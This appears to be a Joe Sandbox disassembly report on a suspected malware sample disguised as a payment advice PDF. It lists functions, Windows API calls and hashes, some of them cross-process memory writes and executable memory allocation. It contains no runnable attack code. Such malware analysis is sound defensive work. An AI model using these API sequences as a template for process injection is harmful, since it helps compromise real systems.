                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 1943609520-557222456
                                                              • Opcode ID: 186d238e2957a31bc5920524e4eda36f9084c2a7087c2c663523cb1476c8668d
                                                              • Instruction ID: 073da85e2b2e99883485a91004a3786fc2073629639cf33176d7e4b2e35f4602
                                                              • Opcode Fuzzy Hash: 186d238e2957a31bc5920524e4eda36f9084c2a7087c2c663523cb1476c8668d
                                                              • Instruction Fuzzy Hash: 39917A711082159FC714EF28C886C6FBBA9FF95724F00091DF895DB2A2EB20ED48CB52
                                                              Function 008AB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                              • CoInitialize.OLE32(00000000), ref: 008AB9BB
                                                              • CoCreateInstance.OLE32(008D2D6C,00000000,00000001,008D2BDC,?), ref: 008AB9D4
                                                              • CoUninitialize.OLE32 ref: 008AB9F1
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: 90fd08fea68ce299543f391817acb1544eb5dbcda1e670cbd70b4b84000e501c
                                                              • Instruction ID: de40d836ee4a12c8f0a64ab32d06da9079427e8910a287ccf7eb664bfc350351
                                                              • Opcode Fuzzy Hash: 90fd08fea68ce299543f391817acb1544eb5dbcda1e670cbd70b4b84000e501c
                                                              • Instruction Fuzzy Hash: 2EA135756042059FDB10DF18C484D6ABBE5FF8A324F048959F89ADB362CB31EC46CB92
                                                              Function 0086501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 008650AD
                                                                • Part of subcall function 008700F0: __87except.LIBCMT ref: 0087012B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: 1e44dab39b2b570542bbd3b6ba61cb59c65195c4489fc117a61389940cd21bcc
                                                              • Instruction ID: 9d5f715d95b2ae03ad7b61cfebb16c6b254ec230713211da4cc92932206929da
                                                              • Opcode Fuzzy Hash: 1e44dab39b2b570542bbd3b6ba61cb59c65195c4489fc117a61389940cd21bcc
                                                              • Instruction Fuzzy Hash: 4051592191CA06D6DB12B728C95137E3B94FB41714F24CA5AE4D9C62AEEF34CDC49E83
                                                              Function 00856192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$_memmove
                                                              • String ID: ERCP
                                                              • API String ID: 2532777613-1384759551
                                                              • Opcode ID: ad33bada139cc6c7b7d1f8b7f8b9a6cbecdd1b7054b7ccdbd2917b9bdd665c2b
                                                              • Instruction ID: 6338ab6d62264243af7f6644cce02a45ecbd0b520189080d34237b36f91a7ee6
                                                              • Opcode Fuzzy Hash: ad33bada139cc6c7b7d1f8b7f8b9a6cbecdd1b7054b7ccdbd2917b9bdd665c2b
                                                              • Instruction Fuzzy Hash: B751BF70900709DFDB24DFA5C881BAAB7E4FF04315F64456EE94ACB251E770AA58CB40
                                                              Function 008997F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00899296,?,?,00000034,00000800,?,00000034), ref: 008A14E6
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0089983F
                                                                • Part of subcall function 008A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008A14B1
                                                                • Part of subcall function 008A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 008A1409
                                                                • Part of subcall function 008A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0089925A,00000034,?,?,00001004,00000000,00000000), ref: 008A1419
                                                                • Part of subcall function 008A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0089925A,00000034,?,?,00001004,00000000,00000000), ref: 008A142F
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008998AC
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008998F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 36cd2b2a5a2e6cdbc53fe937c238ac5f6f1d33655dbf025c80442f72f06cd3dd
                                                              • Instruction ID: 19158e84bbd303906f8938f43ea6405539220ad928f9dc93ece6146ab48cf640
                                                              • Opcode Fuzzy Hash: 36cd2b2a5a2e6cdbc53fe937c238ac5f6f1d33655dbf025c80442f72f06cd3dd
                                                              • Instruction Fuzzy Hash: DF415076901118AFDF10DFA8CC45EDEBBB8FB09300F044059FA85B7541DA706E45CBA1
                                                              Function 008C7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008CF910,00000000,?,?,?,?), ref: 008C79DF
                                                              • GetWindowLongW.USER32 ref: 008C79FC
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008C7A0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: bcf425b81f194a4929742561dca18a810b252840712ac0d9221502273977dce4
                                                              • Instruction ID: e99a4a455047e942e2b917c2bc0da54500f698d962725b840163ed44e1c669c1
                                                              • Opcode Fuzzy Hash: bcf425b81f194a4929742561dca18a810b252840712ac0d9221502273977dce4
                                                              • Instruction Fuzzy Hash: 3431AD3120460AABEB118E38CC45FEA7BB9FB05324F208729F975E22E1D735E9559B50
                                                              Function 008C73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008C7461
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008C7475
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 008C7499
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 4d686e25cbd248e9608947bf573ee038db134c55c5f00fbc4004832e9518acd2
                                                              • Instruction ID: 5328e4d1b754f6ca3c14fdf2f7dc4e394659ff25955fd7fc35de9f9aca4866c6
                                                              • Opcode Fuzzy Hash: 4d686e25cbd248e9608947bf573ee038db134c55c5f00fbc4004832e9518acd2
                                                              • Instruction Fuzzy Hash: 18219132500218ABDF158F64CC46FEA3B7AFB48724F110218FE55AB190DA75EC91DBA0
                                                              Function 008C7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008C7C4A
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008C7C58
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008C7C5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: 6b300c6dc04a369ba8c9596cdfc7eae6dd1ea2ac0024cb6636242e3a36fa502a
                                                              • Instruction ID: d5d904e758838101db619fe3d154c938b8609150a4ae5cb1eb5aaeaceff61dbc
                                                              • Opcode Fuzzy Hash: 6b300c6dc04a369ba8c9596cdfc7eae6dd1ea2ac0024cb6636242e3a36fa502a
                                                              • Instruction Fuzzy Hash: D0216BB1604209AFEB10DF28DCC1EA737FDFB59364B154059FA05DB3A1CA31EC519A60
                                                              Function 008C6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008C6D3B
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008C6D4B
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008C6D70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 4a3e2cc5a743becd8c6eb8608eba0e69c2f5ca235ab7d6a97c2c9aae690d5455
                                                              • Instruction ID: 0ebc9638ff9cbd2bee74090aff7b64f429990937ae34e3040c3c709002127974
                                                              • Opcode Fuzzy Hash: 4a3e2cc5a743becd8c6eb8608eba0e69c2f5ca235ab7d6a97c2c9aae690d5455
                                                              • Instruction Fuzzy Hash: 5E216D32610118ABEB118F54DC45FAB3BBAFB89760F018138FA459B1A0D671DC619BA0
                                                              Function 008C770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008C7772
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008C7787
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008C7794
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: 10c2767d421fc7f025d36b10405cfec9c4c488c5513f1018475b923d0ff9769b
                                                              • Instruction ID: 4246e2d0d47f3d50b438a697a22173d8508275946b634d0862225608fb4cb26a
                                                              • Opcode Fuzzy Hash: 10c2767d421fc7f025d36b10405cfec9c4c488c5513f1018475b923d0ff9769b
                                                              • Instruction Fuzzy Hash: F911C17224420CBAEF245F65CC05FAB7BB9FF88B64F11422CFA55E6190D672E851DB20
                                                              Function 00844C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00844BD0,?,00844DEF,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844C11
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00844C23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 9fb9fb203222cc33632530faf8a2989f8b78f90cf52fe9262f7a6e1af50d4d6e
                                                              • Instruction ID: 27d6630152631668fa166fbe3a3e58414e0a8bb1ae5cf6b69668f75b17e9f6d6
                                                              • Opcode Fuzzy Hash: 9fb9fb203222cc33632530faf8a2989f8b78f90cf52fe9262f7a6e1af50d4d6e
                                                              • Instruction Fuzzy Hash: 78D01234911717CFE7205F71D948B06BAE6FF09351B19CC3E9596D6251E7B4D880C650
                                                              Function 00844C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00844B83,?), ref: 00844C44
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00844C56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: cba410c41cd5e191fffe9138f2a62ced8071fc7e33a1a22df151f59e47f7db02
                                                              • Instruction ID: d40b5ce287f058daba80167a575e62e3a212c721b37365f8eba268ce03885204
                                                              • Opcode Fuzzy Hash: cba410c41cd5e191fffe9138f2a62ced8071fc7e33a1a22df151f59e47f7db02
                                                              • Instruction Fuzzy Hash: 54D01730510727CFE7209F31D948B1AB6E6FF15351B19C83EA6A6D6261E774D880CA50
                                                              Function 008C0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,008C1039), ref: 008C0DF5
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008C0E07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: 08fc70de52f7b7b6b53fefda63e3d930e101e1087cfe0c63dac945ffe054c4f6
                                                              • Instruction ID: 9ca19e34dc9ef1d0177de961e404901a8d0da82d54bd83d8f26b5049286237ff
                                                              • Opcode Fuzzy Hash: 08fc70de52f7b7b6b53fefda63e3d930e101e1087cfe0c63dac945ffe054c4f6
                                                              • Instruction Fuzzy Hash: 7FD08230440326CFE3218F70C808B8272E6FF08392F048C2ED692C6252E6B4D8908A00
                                                              Function 008B90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008B8CF4,?,008CF910), ref: 008B90EE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008B9100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 473d5fd5fcf7f754af5df89fe27f53a862d58e497ccb04ede285fe64c0108e32
                                                              • Instruction ID: 13f7aedd473790e3e6fe15e2dd42aaa8e5f18c39f3fb716c66eb93d531487f46
                                                              • Opcode Fuzzy Hash: 473d5fd5fcf7f754af5df89fe27f53a862d58e497ccb04ede285fe64c0108e32
                                                              • Instruction Fuzzy Hash: E0D01235510713CFE7209F35D818A4676E5FF05351B15C87ED6D6D6761EB78C880CA50
                                                              Function 00881714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: 63ff7dbb91b56eddaeadd9065c0315c01bacbc4c4755c892bda90f485d0c26de
                                                              • Instruction ID: 41561fc35c093be645e9b135ddc99017c79158aaed79591e8386725d9b600912
                                                              • Opcode Fuzzy Hash: 63ff7dbb91b56eddaeadd9065c0315c01bacbc4c4755c892bda90f485d0c26de
                                                              • Instruction Fuzzy Hash: BFD0177184610DEACF50BB90988CCB9737CFB18309F10086AF606E2094EA358B96EB21
                                                              Function 0089717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba6277d6523c26ff82a94c21541e85d5f1dadb71dda4d11ff68c472d6930086c
                                                              • Instruction ID: 42f166c0a9b7fa125089676559c60f263aa4a3e8712ca4f8a032c9dd49c2a6ef
                                                              • Opcode Fuzzy Hash: ba6277d6523c26ff82a94c21541e85d5f1dadb71dda4d11ff68c472d6930086c
                                                              • Instruction Fuzzy Hash: E4C14E74A1421AEFCF14DFA4C884EAEBBB5FF48714B198598E805EB251D730ED81DB90
                                                              Function 008BE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 008BE0BE
                                                              • CharLowerBuffW.USER32(?,?), ref: 008BE101
                                                                • Part of subcall function 008BD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008BD7C5
                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008BE301
                                                              • _memmove.LIBCMT ref: 008BE314
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
